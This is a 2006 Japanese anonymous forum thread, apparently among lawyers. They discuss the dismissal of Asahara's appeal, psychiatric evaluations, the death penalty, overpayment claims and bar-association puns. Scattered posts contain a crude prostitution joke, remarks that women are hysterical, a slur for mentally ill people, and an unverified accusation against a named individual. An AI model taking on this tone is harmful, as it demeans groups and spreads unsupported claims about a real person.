331 :無責任な名無しさん:2006/03/25(土) 15:50:31 ID:GYbx1kGV
私は、先ほど近くの川の土手まで出かけて、45分間お日様に当たって昼寝をしてきました
さー、これから夜中まで頑張ってこの起案を仕上げるぞー。

アスは、彼女との約束があるからな。

332 :無責任な名無しさん:2006/03/25(土) 17:27:22 ID:2XpzL56q
『暴走した威信
追跡・大阪地裁所長「おやじ狩り」事件』(仮)
http://www.ytv.co.jp/document/index02.html
報道劇場
 2006年3月25日(土)25:20〜26:20
 関西ローカル放送

NNNドキュメント’06
 2006年4月2日(日)24:25〜24:55
 全国ネット放送


04年2月、大阪市内の路上で法曹界の大物、大阪地裁の鳥越所長が
おやじ狩りにあい重傷を負った。大阪府警は「威信を掛けた捜査」の結果、
少年3人を含む5人を逮捕。しかしYTVでは起訴前から疑問を抱き、警察
検察が隠蔽していた防犯カメラの存在を発見。容疑者との大幅な身長差
など数々の矛盾と疑惑を報道してきた。結果、成人二人には凶悪事件の
被告としては異例の保釈決定が下り少年一人は釈放。だが残る少年二
人は今も少年院の中で無実を訴えている。

333 :無責任な名無しさん:2006/03/25(土) 18:45:53 ID:spqhIv8L
再任拒否された女性裁判官が
法曹全体の送別会に出てきて
被送別者として上座に座っていた。
 当事者本人やBにヒステリーを起こすことで有名だが、
常識のなさを痛感したねw


334 :無責任な名無しさん:2006/03/25(土) 19:46:49 ID:RZQnei+b
法曹三者ともヒステリー女って多いよな

335 :無責任な名無しさん:2006/03/25(土) 20:26:55 ID:sTLpziuu
>>333
詳しく。

336 :無責任な名無しさん:2006/03/25(土) 21:53:00 ID:uR+9bPyC
送られる側なんだったら、逆に下座に座れないだろ。
お前も常識ないよ。

337 :無責任な名無しさん:2006/03/25(土) 21:57:56 ID:uR+9bPyC
温泉街のポン引きから母娘ドンブリを斡旋するといわれた。
興奮した私は、バイアグラを服用してもうビンビン。

狭い置屋の一室に案内され、最初にやってきたのは
50過ぎのオバサン
ま、考えてみれば母親はこんなものだと思い、ガバガバの穴に突っ込んで
一回戦交える

さて次がお楽しみだ

オバサンは身支度を整えて立ち上がると
廊下の方へ声をかけた

「お母さん、つぎどうぞ」



338 :無責任な名無しさん:2006/03/25(土) 22:25:40 ID:sTLpziuu
というか、送別会に出る神経の方が分からん。

339 :無責任な名無しさん:2006/03/25(土) 23:23:06 ID:UDdjOk1a
>>338
これから弁護士でやっていくのなら、それくらいの度胸がないといけない。

340 :無責任な名無しさん:2006/03/25(土) 23:59:25 ID:spqhIv8L
別に座っている場所が問題ではない。
そもそも、成績不良による雇い止めは、
「御栄転」等で表現され、送別会では一応持ち上げられる「異動」に当たらない。


341 :無責任な名無しさん:2006/03/26(日) 09:55:09 ID:t1Wa235p
■日本死刑廃止運動の安田弁護士:「韓国ばかり見ている」

「死刑制度問題で日本は低能児水準に他ならない。文化だけでなく人権と刑事訴訟の分野
でも『韓流』が必要だ。」

20日に東京の港合同法律事務所で会った、日本弁護士連合会「死刑執行停止実現委員会」
の安田好弘事務局長(58)はインタビューで終始、「犯罪者の人権保護の面で韓国は日本より
遥かに進んでいる。韓国がうらやましい」と語った。韓国では死刑制度廃止法案が国会に3回
提出されたが、日本では死刑の執行を停止する法律さえ上程できないのが端的な事例だ、と
安田弁護士は付け加えた。

日本では議員 80人余りで構成された「死刑廃止を推進する議員連盟」や市民団体「死刑廃止
フォーラム90」、宗教団体、弁護士連合会などが中心となって死刑反対運動を展開した。廃止
に対する社会的共感を得るのが難しく、まずは死刑執行の中止を要求する段階的アプローチ
を試みている。

しかし、「日本では死刑制廃止主張はますます力を失っているのが現実です」と安田弁護士は
残念がった。オウム真理教のサリンガステロなどの影響で、1990年頃に15%あった廃止世論
は半分に落ちこみ、存置世論は60%から80%以上に増えた。死刑確定囚も当時の40人から
2倍に増えた。杉浦正健法務大臣は昨年の就任直後、死刑執行に署名しないと述べたが、政
府の強い圧力のため、わずか1時間で発言を撤回しなければならなかった。安田弁護士は、
「日本が自らの力で死刑制度を廃止するのは、事実上不可能だ」と言い切った。

そこで最も期待をかけているのが、アジア諸国、特に韓国との連帯だ。安田弁護士は、日本の
法曹界では最近「韓国ばかり見ている」として、「韓国を見習うこと」が盛んだと明らかにした。
安田弁護士は、「驚かれるかもしれないが、日本の弁護士である私が韓国の死刑廃止運動に
より積極的に参画している。犯罪者の人権に対する意識に自ら目を開くことができない日本と
しては、近い隣国から来る衝撃波が変化の近道だと信じるからだ」と語った。

▽ソース:ハンギョレ新聞(韓国語)(2006/03/24 19:39)
http://www.hani.co.kr/arti/society/rights/110888.html

342 :無責任な名無しさん:2006/03/26(日) 11:02:35 ID:XFiYuQzO
左遷でも御栄転なんだから問題ないっしょ


343 :無責任な名無しさん:2006/03/26(日) 15:16:14 ID:+K4iiFZ4
ところで、スレタイの関係で言えば、今年は、桜はいつ頃が
見頃なんだ?

344 :無責任な名無しさん:2006/03/26(日) 16:52:46 ID:uF4q5vLm
どこに住んでるんだ?
それによるでしょ。
沖縄だったら、もうとっくの昔に終わってるし。

345 :無責任な名無しさん:2006/03/26(日) 18:20:01 ID:5VtRmTId
>>341
安田先生は、その犯罪者の人権保護が進んでいる韓国で
逮捕された被疑者がすぐにマスコミの直撃インタビューと
カメラのフラッシュにさらされることについて
どうお考えなのだろうか。

346 :無責任な名無しさん:2006/03/26(日) 21:18:31 ID:cFnJscx4
>>345
韓国の記者に話したリップサービスを真に受けるなよ。

347 :無責任な名無しさん:2006/03/26(日) 23:00:21 ID:9q37y7Cg
「被疑者被告人の人権保障拡大」という仕事のお題目の一貫性よりも
マスコミへのリップサービスを優先させるのはどうかなー

348 :無責任な名無しさん:2006/03/26(日) 23:00:52 ID:E/HRoHLx
>>346
実際喋ったことの一部を針小棒大にされたうえ尾鰭をつけられてる可能性が大。

349 :無責任な名無しさん:2006/03/26(日) 23:32:16 ID:EMb/HzQG
>>230
労働事件って裁判官(裁判長)が代わると、判決内容も変わるのですか???

350 :無責任な名無しさん:2006/03/26(日) 23:50:38 ID:4vDfHLqi
ヤミ金と手を組んだ司法書士の自己破産ビジネス
http://www.yomiuri.co.jp/atmoney/yw/yw04042501.htm

ずさんな破産申立をしている司法書士に注意
http://www.bengoshisoudan.com/column/column041104.html

351 :無責任な名無しさん:2006/03/27(月) 02:00:40 ID:n9Ci7rMT
法律事務所はどうするんだろう。

ライブドア会計士所属の港陽監査法人、6月に解散へ
http://headlines.yahoo.co.jp/hl?a=20060326-00000302-yom-soci
 ライブドアの粉飾決算事件で、証券取引法違反(有価証券報告書の虚偽記載)の容疑で
告発される見通しとなった公認会計士が所属する「港陽監査法人」(横浜市)は、6月に解散
する方針を決めた。代表社員の一人が25日、読売新聞の取材に明らかにした。
 代表社員の説明によると、事件の影響でクライアントである企業の多くから契約を打ち切ら
れており、契約が残っている3月期決算の企業についても5月末までには有価証券報告書を
出し終えることから、6月解散を決定したという。
(読売新聞) - 3月26日9時12分更新

352 :無責任な名無しさん:2006/03/27(月) 02:18:09 ID:OLEija+w
べんごしってあたまがわるくてもやっていけるの?

353 :無責任な名無しさん:2006/03/27(月) 02:29:01 ID:mV59HAzH
>>352
あたまわるかったら、司法試験に受かりませんよ(w

354 :無責任な名無しさん:2006/03/27(月) 11:21:32 ID:mYoyVlLo
司法試験は難易度の高い試験だが、別に頭がよくないと受からない試験ではない。
とはいえ官以外の職能団体としてはかなりの集団だと思う。

355 :無責任な名無しさん:2006/03/27(月) 12:14:02 ID:mYoyVlLo
自己破産で懲戒とは。神戸市って凄いや。
http://dailynews.yahoo.co.jp/fc/local/local_governments/?1143425218

356 :無責任な名無しさん:2006/03/27(月) 16:06:16 ID:Z90sZZPw
>>353.354
その通りですが、医師、弁護士ともに、資格を取るときまでは猛勉強を強いられるが、
一旦就職すると永久資格(法律上は、更新制度やその能力のチェック制度がない。この点、自動車運転免許と大違い。)であるから、
頭が悪くなってからでも(例 痴呆症)仕事を続けている人が少数だが居ります。

357 :無責任な名無しさん:2006/03/27(月) 20:34:57 ID:KX2LkLJW
麻原裁判の高裁決定・・・
このタイミングで棄却決定ってメチャクチャ感情的な対応だなぁ。

それにしても、麻原事件ということを措いて、
死刑事件で控訴趣意書の提出期限を守らなくて
控訴棄却になったら、余裕で懲戒もんだな。


358 :無責任な名無しさん:2006/03/27(月) 20:51:42 ID:aLo2XH2y
そりゃそうだ。

で、この事件の場合はどうなんだろうね。

359 :無責任な名無しさん:2006/03/27(月) 21:01:57 ID:RjLWV9Rv
チヅヲやアーチャリーは懲戒請求をするのでしょうか?

360 :無責任な名無しさん:2006/03/27(月) 21:07:29 ID:Gc1agxOt
弁護人に伝えずに拘置所に被告人に会いに行ったり、裁判所様は
デュープロセスをどうお考え!?

361 :無責任な名無しさん:2006/03/27(月) 21:19:43 ID:o6RQEKrj
グダグダ文句言う前に、期限内に控訴趣意書出しとけば
よかっただけの話だろ。

なんともバカバカしい話だな・・・。

362 :無責任な名無しさん:2006/03/27(月) 21:20:49 ID:brsqXLF+
被告人本人の意思がわからないのにどうやって趣意書書くんだよw
全てを争わなきゃいけなくなるだろ

363 :無責任な名無しさん:2006/03/27(月) 22:22:31 ID:XCdDmQpF
それをやったのが一審の弁護団だろうが。
とりあえず争っておくのが身のためだw

364 :無責任な名無しさん:2006/03/28(火) 03:05:47 ID://oOkUHV
弁護団は控訴趣意書を一応作成してあるらしいよ。
棄却決定の異義申し立てで控訴趣意書を提出すれば、控訴棄却決定取消で控訴審が始まる可能性もわずかにある。
これは控訴審が結審した後に下される控訴棄却の『判決』ではなく、控訴審開始手続で
提出が義務付けられている控訴趣意書が提出されなかったことによる、控訴棄却『決定』である。
判決と決定は別物。
控訴棄却の『判決』なら次は上告だが、手続段階または判決前の控訴棄却決定の場合、上告ではなく異議申し立て(抗告)。


365 :無責任な名無しさん:2006/03/28(火) 08:47:36 ID:aCWenaZe
n即+より

>今朝の新聞に打ち切り背景が書いてあった。
>控訴趣意書提出の意思を見せたって弁護士がいってるのは、裁判所に書類を
>持って行って見せて「書類はもう書いてますよ。」って言ってそのまま引っ
>込めて提出しなかったんだって。
>
>そら裁判官もぶち切れるわな。

あひゃ。

366 :無責任な名無しさん:2006/03/28(火) 08:54:10 ID:9d7rfMqO
典型的な弁護過誤だな。
裁判所を舐め過ぎw

まあ、確定まであと2段階あるし、最高裁は死刑事件には慎重だから
当分は揉めると思われ。

367 :外坊:2006/03/28(火) 10:04:18 ID:A5dUmUGZ
裁判所は控訴趣意書を見てから判断してもよかったのではないか。

368 :無責任な名無しさん:2006/03/28(火) 10:28:13 ID:hTBfe+LY
ま,死刑だから遅らせるというのが,妥当な弁護活動かどうかは疑問だな。

369 :無責任な名無しさん:2006/03/28(火) 11:44:01 ID:TBY/Ce+U
麻原はさっさと死刑にするしかないよ。


370 :TN:2006/03/28(火) 12:00:46 ID:GgQnhNZ5
裁判所にケンカ売ってるようなもんだからこうなっても仕方がないね
意思疎通ができないんなら控訴趣意書にその旨の記載をして控訴審を始めればいいだけ

控訴棄却が維持されれば結果的に世論の望むとおりになるわけだから
世間の風当たりはあまりきつくないだろう



371 :無責任な名無しさん:2006/03/28(火) 12:03:18 ID:e5M1Xb2W
弁護人は固有権、独立代理権を有するわけで、法律上は
被告人の意思疎通が不能なので趣意書出せませんは通らない。
それに控訴審は事後審だしねぇ。
何かは書けるはず。

弁護人はどうなるんだろうね。


372 :無責任な名無しさん:2006/03/28(火) 12:55:10 ID:o7a+A1pg
仕事上で接点のある人なんですが,,
何かにつけ「顧問弁護士に相談する」という言葉を織り交ぜるんですね。
強迫的なところもなく,実害もなく,ただひたすらwwwwwなのですが,
時々ヘンに調子に乗ることもあるので,それって,イカサマぽいからやめなはれって,言いたいんですけど。
その人は,単なる無名のライターさんで,形だけの会社(社員なし)を作っている程度なので,
顧問弁護士を雇えるとも思えない。まともに考えれば,これは一種の詐称ではないですかね。
ウソコケ!!ということを事務的に通達するか,自然にわからせる方法ってないですかね。

373 :無責任な名無しさん:2006/03/28(火) 13:41:04 ID:IkrOKSJQ
そりゃ、「顧問弁護士」の解釈が違ってるだけでしょ。
困ったときに、ときどき相談にいく弁護士を、顧問料払ってなくても
「顧問弁護士」と呼ぶ人はいるよ。

374 :無責任な名無しさん:2006/03/28(火) 14:41:41 ID:ITIUIDqt
>>364
抗告審は事後審なので,後から控訴趣意書を提出してもあまり意味はない。

375 :無責任な名無しさん:2006/03/28(火) 14:43:07 ID:ITIUIDqt
顧問弁護士
悪徳弁護士
敏腕弁護士
若手弁護士
貧乏弁護士

どれもほとんど嘘。

376 :無責任な名無しさん:2006/03/28(火) 15:05:39 ID:o7a+A1pg
>>373 レスありがとうございます。

なるほど,おそらく友達の友達の友達が弁護士程度か,
市の法律無料相談に何回か行った程度じゃろとは思っています。
顧問の解釈→超巨大と考えればいいですね。
スレ違いぎみで申し訳なかったです。


377 :無責任な名無しさん:2006/03/28(火) 15:10:10 ID:YKZKaTx5
若手弁護士は客観的なものじゃないか?

378 :無責任な名無しさん:2006/03/28(火) 15:31:02 ID:c/J3Y0pU
還暦過ぎた私めも、若手弁護士のつもりですが・・・・。

379 :Gotham City:2006/03/28(火) 15:31:20 ID:TzeOz31w
美人弁護士も加えたほうがいい



380 :無責任な名無しさん:2006/03/28(火) 15:39:17 ID:c/J3Y0pU
それはさておき、最高裁が同裁くかが見物ですね。

死刑事件にはさすがに慎重に臨むだろうし、
それにしても、法定の提出期限徒過を、今後に一般化しないで本件だけにすませる取扱い、理屈には苦慮するだろうね。

本件の弁護人は、延長された期限すら徒過したばかりか、その日に趣意書を机上に置いて見せたのを持ち帰るという、法と裁判所(官)を嘲弄するような態度を取っている。
皆さんは、どうお考えですか。

381 :無責任な名無しさん:2006/03/28(火) 15:53:04 ID:X4HhhDyK
30うん歳の新人弁護士は「若手弁護士」だろう

382 :TN:2006/03/28(火) 16:21:52 ID:GgQnhNZ5
精神鑑定が話題になる度に思うんだが,一体どの程度の信用性があるのだろうか
自分が精神科にかかってて言うのもなんだが,精神医学はイマイチ信用性に欠ける感じ
詐病の場合にそれを的確に見抜くノウハウが確立されているんだろうか?


383 :無責任な名無しさん:2006/03/28(火) 16:32:59 ID:fnmKOMHl
全く信用性がないと思うね。もうずいぶん以前だが、シャブか何かの事件で、当方がそんなに望まなかったのに
裁判所積極的に鑑定申請するよう働きかけて鑑定したことがあった。詳細は忘れたが、被告人に有利な結果だった。
判決宣告後、検事が俺のもとに近寄り、小声で「かなりおかしいから、早く精神病院に入れた方がよいですよ」と親切に忠告してくれた。
でも、法廷を出て廊下で被告人が「先生上手く演技できましたでしょう」とこっそり言った。
20年ぐらい前の話しだが、いまだにその光景は忘れられない。

384 :無責任な名無しさん:2006/03/28(火) 16:36:14 ID:2mkLc38a
>>382
まだまだ、これからの分野。
>詐病の場合にそれを的確に見抜くノウハウが確立されているんだろうか?
TNセンセが御存命の内には無理です。

385 :無責任な名無しさん:2006/03/28(火) 16:44:28 ID://oOkUHV
拘禁反応に詳しい精神科医の加賀乙彦が面会して、
「こりゃ駄目だ」みたいなこと言ってるからね。
(加賀氏は元・東京拘置所医務官だから、
精神的に逝かれた拘置中の被告人は見慣れている)

加賀氏でさえああいう言い方をしていたら、
裁判所側の鑑定はかなり無理があると思うのだが。
実際、一度も会話できずにあんな結論出してるわけだし。

386 :無責任な名無しさん:2006/03/28(火) 18:58:21 ID:hTBfe+LY
>>383
基地外の演技をしている基地外
と言うのも世の中に存在するよ

387 :無責任な名無しさん:2006/03/28(火) 19:55:25 ID:x8VRvMtR
経験上、精神病とPTSDと全治1週間の診断書って言うのは信用ならないからね。
今回の裁判所の鑑定なんて、結論が先にあるのは見え見えなんだよな・・・

388 :無責任な名無しさん:2006/03/28(火) 19:58:28 ID:s7b0j8+y
洋泉社新書から「ドキュメント精神鑑定」っていう本が出てますが
そのケース事例を見ると責任能力の判定がなんとなくわかります
著書の林幸司氏は当局よりの鑑定人と思われますが
一見する価値はあるかと・・

389 :無責任な名無しさん:2006/03/28(火) 20:18:58 ID:iexgvd24
まぁ、須田のやりそうなことだな。
地裁刑事12部の部総括のころから,唯我独尊のオッサンだったから。


390 :無責任な名無しさん:2006/03/28(火) 20:36:45 ID:x8VRvMtR
彼は、3月で転勤なのかな? 
順当に行けば、どっかの高裁所在地の地裁所長ってあたりか。

391 :無責任な名無しさん:2006/03/28(火) 21:03:13 ID:+KQXsHm0
いろんな意味で,司法制度がおかしくなり始めている。

392 :無責任な名無しさん:2006/03/28(火) 21:56:53 ID:x8VRvMtR
死刑執行は、心神喪失の者には執行できないから(確か、刑訴法か規則)、
どっちにしろ麻原は死刑執行されない。
死刑確定が早くなっても、あんまり意味ないね。


393 :無責任な名無しさん:2006/03/28(火) 22:10:40 ID:3CHMyGC9
風呂場でですね
蛇口で背中をガリッとですね・・・
_
┷┓ ○
  /ヽ
  >

394 :無責任な名無しさん:2006/03/28(火) 22:41:12 ID:9d7rfMqO
>>392
しかし、それを判断するのは法務大臣。
法務大臣が署名さえすれば執行は可能だったりする・・・

395 :無責任な名無しさん:2006/03/28(火) 22:53:55 ID:9d7rfMqO
>>391
その言い方だと、いままではまともだったように聞こえるw

396 :無責任な名無しさん:2006/03/29(水) 10:32:22 ID:bpypJiu4
署名できる根性ある政治家はいないだろ。

397 :無責任な名無しさん:2006/03/29(水) 12:35:53 ID:vjkEDBPQ
>>392
訴訟遂行レベルでは心身喪失と判断されなかったからね。
死刑執行レベルでも同様の判断になるでしょ。

398 :無責任な名無しさん:2006/03/29(水) 14:37:57 ID:XlA6Du8B
けど、控訴趣意書を出さなかった理由って、結局何なんだろね?出さないことで生じる
弁護側のメリットって、全然思い浮かばないんだが。

399 :無責任な名無しさん:2006/03/29(水) 15:03:12 ID:ZUdkqH2B
重大事件だから、決定なんて出さないだろう。って甘い見通しの、時間稼ぎ策では?

400 :無責任な名無しさん:2006/03/29(水) 15:36:24 ID:25Ux1dus
報道によれば、2月でた訴訟能力についての鑑定の結果がでるまでに控訴趣意書を出せば
控訴棄却の決定はしないと裁判所がいっていたらしいね。

それも無視したんじゃ、しょうがないような気がする。


401 :無責任な名無しさん:2006/03/29(水) 18:09:16 ID:BY+CBEZk
趣意書骨子がとっくにできあがっていて、にもかかわらず
今月中に出すって連絡したのがよく分からないな。
出すって連絡せずに趣意書そのものを出せばいいのに。
趣意書が一応提出されてて棄却決定はしづらかっただろうに。



402 :無責任な名無しさん:2006/03/29(水) 18:17:20 ID:Xe26qDY2
国家を揺るがす大犯罪を
裁判官3人の面子のために
うやむやな形で終わらせたとの感が否めない

403 :無責任な名無しさん:2006/03/29(水) 18:32:44 ID:BY+CBEZk
急に正気になった被告人が懲戒請求。
なんてな。

404 :無責任な名無しさん:2006/03/29(水) 18:33:46 ID:ZUdkqH2B
高裁審理、さらに上告までしたけりゃ、その手ぐらいでしょ。

405 :無責任な名無しさん:2006/03/29(水) 20:00:50 ID:05T321SQ
裁判官の忌避と罷免訴追請求はもう弁護人がやっちゃったしね

406 :無責任な名無しさん:2006/03/29(水) 21:24:52 ID:NFY9fQFh
これ以上時間掛けてもあの弁護人じゃまともな審理は期待できない。
打ち切りやむなしだよ。

407 :無責任な名無しさん:2006/03/29(水) 21:49:11 ID:NEISEHww
>>406
あのウンザリするような仕事を、われわれの誰かの代わりにやってもらってると
思えば強く非難する気にならん。

いつ当番弁護士で、大阪池田小事件や仙台筋肉弛緩剤事件みたいのをひくか
わからん。へタすりゃ捜査段階から最高裁まで10年間おつき合い。

408 :無責任な名無しさん:2006/03/29(水) 21:50:37 ID:bbYp7xfD
>>407
委員会派遣だろ

409 :無責任な名無しさん:2006/03/29(水) 21:54:13 ID:05T321SQ
>>407
特別案件指定だから,それはない

410 :無責任な名無しさん:2006/03/29(水) 22:40:20 ID:NEISEHww
>>408
>>409
いや、単独しなくちゃならなくなるわけではないのは分かってるんだけど、
だからといって、必ずしも抜けられるとは限らんだろ。

東住吉放火殺人の件なんか、日頃刑事弁護しない人が、指導担当の
修習生のために、たまたまとった当番弁護士であたったていうんだから
お気の毒としかいいようがない。

411 :無責任な名無しさん:2006/03/29(水) 23:08:47 ID:ORdYUj68
>>386
基地外の演技をする基地外もいるが,それを鑑定した医師の鑑定書が,単なる「基地外」だったら,結論は合ってても間違い鑑定だし。
「精神障害が原因で基地外を演じている」という鑑定ができて,はじめて鑑定として信用性がある。

当職も,鑑定の結果心神耗弱が認められた後で被告人に詐病告白されたことも,明らかに病気だと思われる人が完全責任能力になったこともある。

412 :無責任な名無しさん:2006/03/30(木) 00:48:22 ID:Xg5kG+Xz
精神病と責任能力は完全に=な処理をしているわけではないでしょう。

413 :無責任な名無しさん:2006/03/30(木) 01:01:48 ID:+o3sg9RZ
565 :名無し検定1級さん :2006/03/29(水) 23:41:13
明らかな弁護士法違反の見本

http://www.kabalai.com/

事務所代表プロフィール
職業 : 行政書士
氏名 : 植山 保
前職 : サラ金
経歴 : 営業店勤務 4年
      回収部署勤務 2年
      弁護士交渉部署勤務 1年
得意技 : 内容証明
       告訴・告発
       行政処分・行政指導の要請
       法的回収を前提とした、訴訟提起前の回収。

報酬について
報酬は、返還された過払い額の2割です。
返還後1週間以内にご送金下さい。
また、業務に着手する為の経費の予納金として
5万円を申し受けます。
予納金の送金後の着手となります。

414 :無責任な名無しさん:2006/03/30(木) 01:15:12 ID:u/bWrQyB
ttp://www.zakzak.co.jp/top/2006_03/t2006032930.html

これって,確かにストレートには双方代理・自己代理にならんだろうが,実質的にはどうなんだろうね。まったく問題ないんだろうか。

415 :無責任な名無しさん:2006/03/30(木) 01:52:50 ID:E7FBgk3B
http://www.mochizukiclinic.com/incho/shorui1.html
         ↑
この佐藤弁護士って色々と有名なんですか?

↓このURLより抜粋
http://www.mochizukiclinic.com/incho/incho2.html



416 :無責任な名無しさん:2006/03/30(木) 05:21:30 ID:mwT8uXOJ
ちょっと質問良いですか?
債務者が相続人となっている不動産(相続登記はまだ)を仮差した場合、
代位による相続登記の申請は嘱託ではなく、債権者本人からですよね?
その場合、相続登記の申請書は弁護士が作っていくんでしょうか?

417 :無責任な名無しさん:2006/03/30(木) 10:48:50 ID:roEw/69j
>>416
法務局か書士さんに聞くのがいちばん

418 :無責任な名無しさん:2006/03/30(木) 14:59:43 ID:ZHr3nSco
最近は仕事の合間にしょこたん☆ぶろぐを見るのが楽しみだ。
たまにMKのブログも

しょこたん☆ぶろぐ
http://yaplog.jp/strawberry2/

419 :無責任な名無しさん:2006/03/30(木) 15:25:58 ID:ngdoroUO
村岡元官房長官に無罪がでたね。

検察は意地でも控訴するんだろうな。
弁護人は誰か知ってる?

420 :無責任な名無しさん:2006/03/30(木) 18:01:37 ID:Kh5neH61
大平光代の再婚相手の川下清弁護士てどんな人なの?

http://www.nikkansports.com/general/p-gn-tp0-20060330-13010.html
弁護士の大平光代さん電撃再婚
 「だから、あなたも生き抜いて」が大ベストセラーになった弁護士の大平光代さん(40)が、先月14日のバレンタインデーに再婚していたことが29日、分かった。相手は同じ弁護士事務所に所属する川下清弁護士(51)。
婚姻届を提出しただけで、挙式や披露宴などは行っていない。お互いに再婚同士で、電撃結婚だったという。

 大平さんは03年12月、関淳一大阪市長に請われて大阪市助役に就任した。実質トップとして携わった市政改革本部の調査員に任命されたのが川下氏だった。
関係者によると、大平さんは弁護士の先輩として川下氏にあこがれていたが、年齢から当然妻子がいると思い込んでいたという。それが一緒に仕事をするようになり、独身であることが判明。
川下氏に子供がいないこともあり、急接近した。2人をよく知る社会福祉法人理事長の竹中ナミさんは「女性として好きな方ができてよかった」と祝福した。

 大平さんは16歳で暴力団組長と結婚。著書などによると、今も背中に観音様と蛇の入れ墨がある。離婚後の22歳、大阪市内でホステスをしていた時に養父に出会い立ち直り、29歳で司法試験に合格した。
2人が所属する法律事務所は「プライベートなことなのでお答えすることはありません」と話している。

[2006年3月30日7時19分 紙面から]




421 :無責任な名無しさん:2006/03/30(木) 20:30:50 ID:x8ynroQW
大平先生〜,★:゜*☆※>('-'*)♪オメデトウ♪(*'-')<※★:゜*☆

422 :無責任な名無しさん:2006/03/31(金) 13:34:39 ID:kRudjbV5
>>420
元大弁副会長。
俺が知ってるのはそのくらい。

423 :無責任な名無しさん:2006/03/31(金) 17:40:59 ID:mKg+9PDm
今、過払金の計算をしているんですが、むなしい作業ですね。

424 :無責任な名無しさん:2006/03/31(金) 18:02:51 ID:F0X9MrIY
引き直し計算のこと?イソ弁なら自分でやらざるを得ないかもね。


425 :無責任な名無しさん:2006/03/31(金) 18:19:54 ID:vQABLB6F
>>423
簡単確実に金を回収できて、回収額の2割が報酬という相場からすれば、
むしろ、うれしい作業と考えるべきかも。

426 :MS754 ◆yGUnQdhyV2 :2006/03/31(金) 23:21:26 ID:o7jfuwgP
明日は、花見です。
>>423
頑張ってください。


427 :無責任な名無しさん:2006/03/32(土) 00:31:51 ID:wBfthg54
明日から4月か

428 :無責任な名無しさん:2006/03/32(土) 00:37:15 ID:iT2YDsAi
3月最後の32日を楽しもうw

429 :無責任な名無しさん:2006/03/32(土) 00:39:37 ID:sTztxVDv
>>423
過払い金の外注があるみたいだよ。1件3000円くらいらしい。

430 :無責任な名無しさん:2006/03/32(土) 00:42:24 ID:mQciA04Q
>>423
外注って計算だけ? それとも取引履歴の取り寄せまでしてくれるの?w

431 :無責任な名無しさん:2006/03/32(土) 00:57:44 ID:sTztxVDv
計算だけ

432 :無責任な名無しさん:2006/03/32(土) 01:18:48 ID:kn41dQuP
ああ〜、GS430ほしいよお。
マンソン買ったばっかだけど、ほしいよお。マジ、ほしいよお。

433 :無責任な名無しさん:2006/03/32(土) 08:48:22 ID:s+8uX8TY
たかだか600万じゃないか
買え買え
買って仕事がんばれよ

434 :無責任な名無しさん:2006/03/32(土) 08:52:46 ID:s+8uX8TY
http://021.gamushara.net/mongoose/data/mierukai.jpg

435 :無責任な名無しさん:2006/03/32(土) 12:29:20 ID:zOSDlZHv
                         ↑↑↑

436 :無責任な名無しさん:2006/03/32(土) 15:45:46 ID:d6oAEkpJ
>>432
GSってデザインがカッコ悪くない?
ハクもつくし、もう少し待ってLS買え

437 :無責任な名無しさん:2006/03/32(土) 22:37:41 ID:kn41dQuP
LS?オヤジっぽい。いらね。

438 :無責任な名無しさん:2006/03/32(土) 23:09:10 ID:cRoenFnE
>>432
半端な排気量のバイクですな

439 :無責任な名無しさん:2006/03/32(土) 23:50:56 ID:0AhEnlqT
PロミスのCMに出てくる、弁当をもらう「トシオさん」、
いかにも破産の相談に来そうな顔をしている。

440 :無責任な名無しさん:2006/04/02(日) 00:41:10 ID:6xIBm707
やれやれ,せっかくの土曜を潰して示談に行ったのに話がまとまらなかった,
徒労感だけが残ったorz

441 :無責任な名無しさん:2006/04/02(日) 01:04:08 ID:2JN1uv+y
>>440 乙彼。

442 :無責任な名無しさん:2006/04/02(日) 07:17:29 ID:TEsIXAxw
雨は嫌いだ‥‥‥‥‥

443 :無責任な名無しさん:2006/04/02(日) 11:37:37 ID:BjXiLD+g
やれやれ

444 :無責任な名無しさん:2006/04/02(日) 15:11:25 ID:TEsIXAxw
>442
スマン誤爆したorz

445 :無責任な名無しさん:2006/04/02(日) 21:36:56 ID:3I8oIlyS
>>436>>437
いずれにしてもセダンはオヤジだよ。

446 :無責任な名無しさん:2006/04/02(日) 22:32:47 ID:95Cd+Irs
じゃ、フェラーリ。

447 :無責任な名無しさん:2006/04/03(月) 00:15:15 ID:I9OSLLdu
成金だなw

448 :無責任な名無しさん:2006/04/03(月) 02:12:05 ID:kbEaLgHV
フェラーリなんて日本の公道で乗る車じゃないな


449 :無責任な名無しさん:2006/04/03(月) 02:13:58 ID:pCs8V6TG
勝利トラックw

450 :無責任な名無しさん:2006/04/03(月) 10:30:53 ID:FtkMa7vM
今年入って3度目の風邪。
なぜだろう,なぜかしら…。
裁判所は休みでも打ち合わせは満載なのに。

451 :無責任な名無しさん:2006/04/03(月) 13:33:25 ID:8Urdi+/D
ストレスで体が弱っているのではないですか?
温泉で休養でもできればいいのでしょうけどね。

452 :無責任な名無しさん:2006/04/03(月) 17:45:58 ID:/jiGVlh1
>>422
当方、東京弁護士会の会員。
東京では東弁、1弁、2弁って略すけど
他地域の弁護士会の略称って聞いたことがないな。

大阪弁護士会って大弁って略すの?

で、なんて発音するの?

453 :無責任な名無しさん:2006/04/03(月) 17:52:45 ID:iDdWE6Vy
うんこの正式名称と同じです

454 :無責任な名無しさん:2006/04/03(月) 18:30:22 ID:mukti19c
大阪簡易裁判所の調停事件はダイカンチョウといいます。

455 :無責任な名無しさん:2006/04/03(月) 20:16:29 ID:v1Xj1xj3
中部地方では,中弁といえば中部弁連のことだが,中国地方では中国弁連のことだ。
どちらも中弁(ちゅうべん)という。

456 :無責任な名無しさん:2006/04/03(月) 20:44:10 ID:kbEaLgHV
へ〜
へ〜
へ〜


457 :無責任な名無しさん:2006/04/03(月) 21:04:57 ID:ewUt9oNV
だいべん,ちゅうべん,とくれば・・・・

458 :無責任な名無しさん:2006/04/03(月) 21:51:56 ID:8Urdi+/D
かんべんしてくれ・・・

459 :無責任な名無しさん:2006/04/03(月) 22:34:47 ID:GDz3kTe0
小豆島弁護士会

460 :MS ◆yh8vvHxIwY :2006/04/04(火) 00:55:03 ID:xDuwgvCW
>>452-459
笑いすぎて、眠れなくなりました。

461 :MS754 ◆yGUnQdhyV2 :2006/04/04(火) 00:56:12 ID:xDuwgvCW
あ、コテ間違えた。

462 :無責任な名無しさん:2006/04/04(火) 01:24:09 ID:piE7zr1I
北海道弁護士連合会
略して ほか弁

463 :無責任な名無しさん:2006/04/04(火) 01:35:50 ID:oDNz7gqd
阿寒湖弁護士連合会
略して あっかんべ

464 :無責任な名無しさん:2006/04/04(火) 02:08:54 ID:piE7zr1I
検察官OB弁護士会
略して 検便

